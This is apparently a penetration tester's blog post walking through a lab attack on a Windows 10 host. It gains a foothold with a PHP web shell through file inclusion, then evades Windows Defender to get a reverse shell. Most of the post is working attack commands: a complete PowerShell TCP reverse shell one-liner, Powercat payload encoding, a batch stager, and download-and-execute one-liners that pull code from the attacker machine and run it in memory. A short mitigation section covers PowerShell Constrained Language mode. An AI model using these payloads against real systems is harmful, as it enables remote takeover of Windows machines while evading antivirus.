Evade Windows Defender reverse shell detection with Powercat
Summary
In the article, I will show you how you can use Powercat to set up a reverse shell without detection by the Windows Defender software.
Disclaimer
This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you're ready to learn something new for the good, then read on.
Hello everyone who cares about cybersecurity! Welcome to my debut blog post. My name is Nol, what I do for a living is eat and penetration testing. Just kidding, when I have time I will spend it with my family. Since 1999, I have worked in the information technology industry and since November 2018 as a full-time penetration tester. I've always been passionate about security. I obtained my first defensive security certification in 2008 when I successfully passed Microsoft MCSE + Security certification. Since then, I have been involved in cybersecurity on both defensive and offensive levels.
Over the years, I have put together a number of ideas, instructions and tips. Now is the time to write them down for anyone else interested. As I mentioned earlier, use it for the sake of improving safety. For each approach, I will include recommendations to mitigate the risks.
My first blog is about a 'stealth' interactive shell. In other words, a shell that is not detected by the Windows Defender software. I'm going to show you what happens when you got caught, if you try to establish a reverse connection on a fully updated Windows 10 machine with integrated PowerShell, netcat or Metasploit commands. After that, I'll show you what you can do to configure a reverse connection without getting stopped by Microsoft Windows Defender software.
The POC consists of 2 machines: a victim (fully updated Windows 10) and an attacker (Kali Linux 2022.1 release). We only used the Microsoft Windows Defender software and did not test the payload against other vendors.
Victim:
- Windows 10 Professional [Version 10.0.19044.1645]
- IP-Address: 192.168.62.165
- Security: Default settings for antivirus detection and firewall rules.
- Software: Xampp for Windows and OWASP Mutillidae vulnerable web server.
- User context: POC user in member of local Users group.
Windows 10 Security Dashboard:
Windows Defender Antivirus settings
Windows Firewall
Attacker:
- Kali Linux
- IP-Address: 192.168.62.161
Initial foothold:
Our initial foothold consists of a PHP web shell loaded by a Local File Inclusion (LFI) vulnerability.
For example, we can use the web shell to execute the 'whoami' command:
http://192.168.62.165/mutillidae/index.php?page=../../../../../../../../Temp/simple-backdoor.php&cmd=whoamiWeb shell access with target Windows 10 machine
What happens if we don't do anything to evade the Windows Defender software?
Windows uses the Anti-malware Scan Interface (AMSI) to detect the execution of malicious PowerShell code. For example, the following PowerShell code will set-up a reverse connection and is seen as malicious:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.62.161',443); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();} $client.Close();"This code will open a network connection and build a reverse shell on the Kali attacker machine.
Let's see what happens.
- Performed on 192.168.62.161 (attacker machine, Kali Linux).
Start a netcat listener (port 443
rlwrap nc -nlvp 443
2. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)
Copy and pasted the PowerShell code inside the web shell (?cmd=<paste code here>).
Result:
Nothing happened...
A possible cause is the fact that we did not URL encode the PowerShell payload. We can encode the PowerShell payload using an online URL encoder (https://meyerweb.com/eric/tools/dencoder/) and retry.
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(%27192.168.62.161%27%2C443)%3B%20%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%20%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20(pwd).Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%20%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%3B%7D%20%24client.Close()%3B%22%203. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)
Copy and pasted the PowerShell code inside the web shell (?cmd=<paste code here>).
Result:
Nothing happens, the code is not executed.
4. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)
If we try to execute the same code in an interactive Windows command shell, we notice the following error:
This script contains malicious content and has been blocked by your antivirus software.
Furthermore, we tried to set-up a reverse connection using netcat. This failed as well.
If you are ready to discover how we can get a reverse shell after these restrictions, then read on.
POC 01 Evade Windows Defender software with Powercat
Powercat (https://github.com/besimorhino/powercat) is a simple network utility used to perform low-level network communication operations. The tool is an implementation of the well-known Netcat in PowerShell.
To evade the Windows Defender antivirus software, we can encode reverse shell payload with Powercat. Powercat has a good feature to encode a command to Hexadecimal Array. This way, some of the basic security features can be bypassed.
Requirement:
The exploited user is allowed to execute PowerShell commands.
- Performed on 192.168.62.161 (attacker machine, Kali Linux).
Download powercat.ps1, execute powercat and create an encoded payload file (/tmp/shell-443.txt).
LHOST=192.168.62.161
LPORT=443
rshell=shell-443.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /tmp/$rshell
2. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Create a Windows batch file (/tmp/backup.bat). This batch file includes the a PowerShell one liner to download and execute the encode Powercat code in RAM.
LHOST=192.168.62.161
LPORT_web=80
rshell=shell-443.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${LHOST}:${LPORT_web}/${rshell}');iex 'powershell -E \$code'" >/tmp/backup.bat
3. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Launch a Python webserver to stage the files backup.bat and shell-443.txt.
python3 -m http.server 80 --directory /tmp4. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Start a netcat listener (port 443).
rlwrap nc -nlvp 4435. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)
Execute a PowerShell one liner that will download the payload file (backup.bat) and execute the contents of this file. Copy and paste the one liner below as payload inside the web shell (?cmd=<payload>). URL encoding of the payload was not necessary.
START /B powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.62.161:80/backup.bat','C:\Windows\Tasks\backup.bat');IEX 'c:\Windows\Tasks\backup.bat'
Result:
The required files are downloaded and we got an interactive shell!
It's also possible the skip step 2 (creating /tmp/backup.bat file on Kali) and directly execute the Powercat payload.
5b. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)
Execute a PowerShell one liner that directly execute the Powercat payload, without first downloading the file (backup.bat). Copy and paste the three one liners below as payload inside the web shell (?cmd=<payload>).
START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://192.168.62.161:80/shell-443.txt');iex 'powershell -E $code'Result:
We got an interactive shell!
Mitigation recommendations.
From a defensive perspective, it is difficult to stop this attack, but not impossible. The attack depends on the ability for the exploited user to execute PowerShell commands. Disabling or restricting PowerShell will stop this attack.
Use PowerShell 'Constraint mode'
By default, PowerShell operates in Full Language mode, in which all functions are available. This includes access to all language elements, cmdlets, and modules, as well as the file system and the network. Workstations can be configured to use PowerShell in 'Constrained Mode', wherein the capability to launch COM and .NET.objects is limited. For example, it's not possible anymore to execute New-Object commands. This may be undesirable, but it stops the Powercat attack.
- Performed on 192.168.62.165 (victim machine, Windows 10)
Add a new system variable __PSLockDownPolicy with value 4 and reboot the workstation.
2. Performed on 192.168.62.165 (victim machine, Windows 10)
Login interactively and open a PowerShell command window. Execute the malicious PowerShell code from step 1.
Result:
It is not possible to execute the "New-Object()" functions which are needed for the Powercat reverse shell connection.
We also uploaded our payload file virustotal.com and did analysis on all 57 antivirus software vendors. Nine out of 57 considered our payload file (shell-443.txt) as malicious.
That was it! In my next blog, I will continue with another method of Windows Defender evasion. It gets interesting, because it is completely without the use of PowerShell.
And remember, don't put up the black hat!
